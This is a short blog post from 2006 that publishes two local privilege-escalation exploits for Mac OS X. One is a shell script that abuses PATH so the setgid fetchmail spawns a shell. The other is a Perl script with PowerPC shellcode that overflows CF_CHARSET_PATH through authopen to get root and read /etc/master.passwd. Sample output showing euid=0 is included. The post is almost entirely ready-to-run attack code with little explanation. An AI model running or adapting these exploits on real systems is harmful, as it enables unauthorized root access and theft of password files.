Subscribe via feed.

OSX: local fetchmail exploit

Posted by deepquest on August 5, 2006 – 3:25 am

local fetchmail exploit v1 an v2

#!/bin/sh
#
# Previously undisclosed local fetchmail issue. This takes setgid=6
#

export PATH=/tmp:$PATH
echo /bin/sh -i > /tmp/uname
chmod +x /tmp/uname
/usr/bin/fetchmail -V

v2:

#!/usr/bin/perl
#
# Variant of CF_CHARSET_PATH a local root exploit by v9_at_fakehalo.us
#
# Jill-Does-Computer:/tmp jilldoe$ ./authopen-CF_CHARSET.pl 0
# *** Target: 10.3.7 Build 7T65 on PowerPC, Padding: 1
# sh-2.05b# id
# uid=502(jilldoe) euid=0(root) gid=502(jilldoe) groups=502(jilldoe), 79(appserverusr), 80(admin), 81(appserveradm)
#
#

foreach $key (keys %ENV) {

delete $ENV{$key};

}

#// ppc execve() code by b-r00t + nemo to add seteuid(0)
$sc =
β€œ\x7c\x63\x1a\x79” .
β€œ\x40\x82\xff\xfd” .
β€œ\x39\x40\x01\xc3” .
β€œ\x38\x0a\xfe\xf4” .
β€œ\x44\xff\xff\x02” .
β€œ\x39\x40\x01\x23” .
β€œ\x38\x0a\xfe\xf4” .
β€œ\x44\xff\xff\x02” .
β€œ\x60\x60\x60\x60” .
β€œ\x7c\xa5\x2a\x79” .
β€œ\x40\x82\xff\xfd” .
β€œ\x7d\x68\x02\xa6” .
β€œ\x3b\xeb\x01\x70” .
β€œ\x39\x40\x01\x70\x39\x1f\xfe\xcf” .
β€œ\x7c\xa8\x29\xae\x38\x7f\xfe\xc8” .
β€œ\x90\x61\xff\xf8\x90\xa1\xff\xfc” .
β€œ\x38\x81\xff\xf8\x38\x0a\xfe\xcb” .
β€œ\x44\xff\xff\x02\x7c\xa3\x2b\x78” .
β€œ\x38\x0a\xfe\x91\x44\xff\xff\x02” .
β€œ\x2f\x62\x69\x6e\x2f\x73\x68\x58”;

$tgts{β€œ0”} = β€œ10.3.7 Build 7T65 on PowerPC:1”;
$tgts{β€œ1”} = β€œ10.3.7 debug 0x41424344:0”;

unless (($target) = @ARGV) {

print β€œ\n\nUsage: $0 \n\nTargets:\n\n”;

foreach $key (sort(keys %tgts)) {
($a,$b) = split(/\:/,$tgts{β€œ$key”});
print β€œ\t$key . $a\n”;
}

print β€œ\n”;
exit 1;
}

$ret = pack(β€œl”, ($retval));
($a,$b) = split(/\:/,$tgts{β€œ$target”});
print β€œ*** Target: $a, Padding: $b\n”;

# add a wrapper here if you want more than euid=0
open(SUSH,”>/tmp/sh”);
printf SUSH β€œ/bin/csh -i\n”;

$ENV{β€œCF_CHARSET_PATH”} = β€œA” x 1048 . pack(β€˜l’, 0xbffffef6) x 2;

$ENV{β€œAPPL”} = β€œ.” x $b . β€œiiii” x 40 . $sc ;

system(β€œ/usr/libexec/authopen /etc/master.passwd”);


This post is under β€œSecurity” and has no respond so far.
If you enjoy this article, make sure you subscribe to my RSS Feed.

Post a reply

You must be logged in to post a comment.